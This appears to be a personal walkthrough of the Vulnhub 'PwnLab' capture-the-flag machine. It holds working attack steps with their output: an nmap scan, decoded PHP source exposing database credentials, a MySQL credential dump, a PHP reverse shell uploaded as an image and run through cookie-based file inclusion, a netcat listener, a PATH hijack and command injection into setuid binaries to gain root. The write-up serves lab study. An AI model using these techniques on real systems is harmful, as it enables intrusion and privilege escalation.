Vulnhub - Pwnlab.

This machine was nice. I learnt something new: remote file inclusion. There are many examples on google. Google it. Let's start:
# Nmap 7.60 scan initiated Sun Feb 18 12:37:05 2018 as: nmap -sV -sC -p- -oN nmap.txt 10.0.2.23 Nmap scan report for 10.0.2.23 Host is up (0.00014s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: PwnLab Intranet Image Hosting 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 37405/udp status |_ 100024 1 49755/tcp status 3306/tcp open mysql MySQL 5.5.47-0+deb8u1 | mysql-info: | Protocol: 10 | Version: 5.5.47-0+deb8u1 | Thread ID: 38 | Capabilities flags: 63487 | Some Capabilities: Support41Auth, ConnectWithDatabase, LongPassword, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, SupportsTransactions, DontAllowDatabaseTableColumn, InteractiveClient, IgnoreSigpipes, LongColumnFlag, ODBCClient, Speaks41ProtocolNew, FoundRows, SupportsCompression, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults | Status: Autocommit | Salt: IxB!yb^3}Ct>uV0)zPat |_ Auth Plugin Name: 88 49755/tcp open status 1 (RPC #100024) MAC Address: 08:00:27:61:28:A2 (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Feb 18 12:37:22 2018 -- 1 IP address (1 host up) scanned in 17.65 seconds

After trying many stuff, i discover RFI. And, with that information, i manage to get "inside information" of files inside the server. This site explains this hacking method. I manage to get page as base64, so i created python script with that information and decode those pages of the server:
import base64 print "INDEX ====" index = "PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9zZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09PS0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFuZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2VzL3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/cGhwDQoJaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFnZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNlcnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUgaW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4=" print (base64.b64decode(index)) print "LOGIN ====" login="PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCnJlcXVpcmUoImNvbmZpZy5waHAiKTsNCiRteXNxbGkgPSBuZXcgbXlzcWxpKCRzZXJ2ZXIsICR1c2VybmFtZSwgJHBhc3N3b3JkLCAkZGF0YWJhc2UpOw0KDQppZiAoaXNzZXQoJF9QT1NUWyd1c2VyJ10pIGFuZCBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkpDQp7DQoJJGx1c2VyID0gJF9QT1NUWyd1c2VyJ107DQoJJGxwYXNzID0gYmFzZTY0X2VuY29kZSgkX1BPU1RbJ3Bhc3MnXSk7DQoNCgkkc3RtdCA9ICRteXNxbGktPnByZXBhcmUoIlNFTEVDVCAqIEZST00gdXNlcnMgV0hFUkUgdXNlcj0/IEFORCBwYXNzPT8iKTsNCgkkc3RtdC0+YmluZF9wYXJhbSgnc3MnLCAkbHVzZXIsICRscGFzcyk7DQoNCgkkc3RtdC0+ZXhlY3V0ZSgpOw0KCSRzdG10LT5zdG9yZV9SZXN1bHQoKTsNCg0KCWlmICgkc3RtdC0+bnVtX3Jvd3MgPT0gMSkNCgl7DQoJCSRfU0VTU0lPTlsndXNlciddID0gJGx1c2VyOw0KCQloZWFkZXIoJ0xvY2F0aW9uOiA/cGFnZT11cGxvYWQnKTsNCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAiTG9naW4gZmFpbGVkLiI7DQoJfQ0KfQ0KZWxzZQ0Kew0KCT8+DQoJPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+DQoJPGxhYmVsPlVzZXJuYW1lOiA8L2xhYmVsPjxpbnB1dCBpZD0idXNlciIgdHlwZT0idGVzdCIgbmFtZT0idXNlciI+PGJyIC8+DQoJPGxhYmVsPlBhc3N3b3JkOiA8L2xhYmVsPjxpbnB1dCBpZD0icGFzcyIgdHlwZT0icGFzc3dvcmQiIG5hbWU9InBhc3MiPjxiciAvPg0KCTxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj4NCgk8L2Zvcm0+DQoJPD9waHANCn0NCg==" print (base64.b64decode(login)) print "UPLOAD =====" upload="PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCmlmICghaXNzZXQoJF9TRVNTSU9OWyd1c2VyJ10pKSB7IGRpZSgnWW91IG11c3QgYmUgbG9nIGluLicpOyB9DQo/Pg0KPGh0bWw+DQoJPGJvZHk+DQoJCTxmb3JtIGFjdGlvbj0nJyBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPg0KCQkJPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J2ZpbGUnIGlkPSdmaWxlJyAvPg0KCQkJPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nc3VibWl0JyB2YWx1ZT0nVXBsb2FkJy8+DQoJCTwvZm9ybT4NCgk8L2JvZHk+DQo8L2h0bWw+DQo8P3BocCANCmlmKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKSB7DQoJaWYgKCRfRklMRVNbJ2ZpbGUnXVsnZXJyb3InXSA8PSAwKSB7DQoJCSRmaWxlbmFtZSAgPSAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXTsNCgkJJGZpbGV0eXBlICA9ICRfRklMRVNbJ2ZpbGUnXVsndHlwZSddOw0KCQkkdXBsb2FkZGlyID0gJ3VwbG9hZC8nOw0KCQkkZmlsZV9leHQgID0gc3RycmNocigkZmlsZW5hbWUsICcuJyk7DQoJCSRpbWFnZWluZm8gPSBnZXRpbWFnZXNpemUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddKTsNCgkJJHdoaXRlbGlzdCA9IGFycmF5KCIuanBnIiwiLmpwZWciLCIuZ2lmIiwiLnBuZyIpOyANCg0KCQlpZiAoIShpbl9hcnJheSgkZmlsZV9leHQsICR3aGl0ZWxpc3QpKSkgew0KCQkJZGllKCdOb3QgYWxsb3dlZCBleHRlbnNpb24sIHBsZWFzZSB1cGxvYWQgaW1hZ2VzIG9ubHkuJyk7DQoJCX0NCg0KCQlpZihzdHJwb3MoJGZpbGV0eXBlLCdpbWFnZScpID09PSBmYWxzZSkgew0KCQkJZGllKCdFcnJvciAwMDEnKTsNCgkJfQ0KDQoJCWlmKCRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvZ2lmJyAmJiAkaW1hZ2VpbmZvWydtaW1lJ10gIT0gJ2ltYWdlL2pwZWcnICYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvanBnJyYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvcG5nJykgew0KCQkJZGllKCdFcnJvciAwMDInKTsNCgkJfQ0KDQoJCWlmKHN1YnN0cl9jb3VudCgkZmlsZXR5cGUsICcvJyk+MSl7DQoJCQlkaWUoJ0Vycm9yIDAwMycpOw0KCQl9DQoNCgkJJHVwbG9hZGZpbGUgPSAkdXBsb2FkZGlyIC4gbWQ1KGJhc2VuYW1lKCRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkuJGZpbGVfZXh0Ow0KDQoJCWlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkdXBsb2FkZmlsZSkpIHsNCgkJCWVjaG8gIjxpbWcgc3JjPVwiIi4kdXBsb2FkZmlsZS4iXCI+PGJyIC8+IjsNCgkJfSBlbHNlIHsNCgkJCWRpZSgnRXJyb3IgNCcpOw0KCQl9DQoJfQ0KfQ0KDQo/Pg==" print (base64.b64decode(upload)) print "CONFIG ======" config= "PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+" print (base64.b64decode(config)) print "PASSWORDS ========" arr = ("Sld6WHVCSkpOeQ==","U0lmZHNURW42SQ==","aVN2NVltMkdSbw==") for i in arr: print (base64.b64decode(i))

As you can see, you got all information you need - including some from data base, that i got here:
mysql -uroot -pH4u%QJ_H99 -h10.0.2.23 Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 50 Server version: 5.5.47-0+deb8u1 (Debian) Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [(none)]> use User; ERROR 1044 (42000): Access denied for user 'root'@'%' to database 'User' MySQL [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | Users | +--------------------+ 2 rows in set (0.00 sec) MySQL [(none)]> use Users; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MySQL [Users]> show tables; +-----------------+ | Tables_in_Users | +-----------------+ | users | +-----------------+ 1 row in set (0.00 sec) MySQL [Users]> desc users; +-------+-------------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +-------+-------------+------+-----+---------+-------+ | user | varchar(30) | YES | | NULL | | | pass | varchar(30) | YES | | NULL | | +-------+-------------+------+-----+---------+-------+ 2 rows in set (0.00 sec) MySQL [Users]> select*from users; +------+------------------+ | user | pass | +------+------------------+ | kent | Sld6WHVCSkpOeQ== | | mike | U0lmZHNURW42SQ== | | kane | aVN2NVltMkdSbw== | +------+------------------+ 3 rows in set (0.00 sec) MySQL [Users]>

After getting user and password, i manage to upload an "image"(REVERSESHELL) inside the server with BurpSuite.Check it out:

After uploading an "image", please remember to copy this imagem url, so can include this file image in index, cause it had the code below:
<?php //Multilingual. Not implemented yet. //setcookie("lang","en.lang.php"); if (isset($_COOKIE['lang'])) { include("lang/".$_COOKIE['lang']); } // Not implemented yet. ?>
My url url was:

So, in burpsuit, to include this image i had to do this:

so i could run it as a php script inside the server, cause it was included. I run to kali terminal before forwarding in burpsuit: nc -lvp 4444.

Now i'm inside. I test other password that i found inside the mysql server. I manage to access kent. After that, i could access mike by hacking msgmike script. When i was at mike, i saw msg2root. I was able to hack it into root. Check this out:
listening on [any] 4444 ... 10.0.2.23: inverse host lookup failed: Unknown host connect to [10.0.2.21] from (UNKNOWN) [10.0.2.23] 33639 Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux 15:25:07 up 53 min, 0 users, load average: 0.00, 0.01, 0.03 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python -c 'import pty; pty.spawn("/bin/sh")' $ /bin/bash /bin/bash www-data@pwnlab:/$ su - kane su - kane Password: iSv5Ym2GRo kane@pwnlab:~$ echo "/bin/sh" >> cat echo "/bin/sh" >> cat kane@pwnlab:~$ chmod 777 cat chmod 777 cat kane@pwnlab:~$ export PATH=.:${PATH} export PATH=.:${PATH} kane@pwnlab:~$ ls ls cat msgmike msg.txt kane@pwnlab:~$ ls -lah ls -lah total 36K drwxr-x--- 2 kane kane 4.0K Dec 30 14:47 . drwxr-xr-x 6 root root 4.0K Mar 17 2016 .. -rw------- 1 kane kane 1.4K Feb 18 11:43 .bash_history -rw-r--r-- 1 kane kane 220 Mar 17 2016 .bash_logout -rw-r--r-- 1 kane kane 3.5K Mar 17 2016 .bashrc -rwxrwxrwx 1 kane kane 8 Feb 18 10:43 cat -rwsr-sr-x 1 mike mike 5.1K Mar 17 2016 msgmike -rw-rw-rw- 1 kane kane 0 Dec 30 14:33 msg.txt -rw-r--r-- 1 kane kane 675 Mar 17 2016 .profile kane@pwnlab:~$ ./msgmike ./msgmike $ whoami whoami mike $ /bin/bash /bin/bash mike@pwnlab:~$ ls ls cat msgmike msg.txt mike@pwnlab:~$ cd /home/mike cd /home/mike mike@pwnlab:/home/mike$ ls ls msg2root msgroot mike@pwnlab:/home/mike$ ./msg2root ./msg2root Message for root: ;/bin/sh ;/bin/sh # whoami whoami root # cd /root cd /root # ls ls flag.txt messages.txt # cat flag.txt cat flag.txt .-=~=-. .-=~=-. (__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _) (_ ___) _____ _ (_ ___) (__ _) / __ \ | | (__ _) ( _ __) | / \/ ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __) (__ _) | | / _ \| '_ \ / _` | '__/ _` | __/ __| (__ _) (_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \ (_ ___) (__ _) \____/\___/|_| |_|\__, |_| \__,_|\__|___/ (__ _) ( _ __) __/ | ( _ __) (__ _) |___/ (__ _) (__ _) (__ _) (_ ___) If you are reading this, means that you have break 'init' (_ ___) ( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __) (__ _) this challenge. (__ _) (_ ___) (_ ___) ( _ __) Please send me your feedback or your writeup, I will love ( _ __) (__ _) reading it (__ _) (__ _) (__ _) (__ _) For sniferl4bs.com (__ _) ( _ __) claor@PwnLab.net - @Chronicoder ( _ __) (__ _) (__ _) (_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___) `-._.-' `-._.-' # cat messages.txt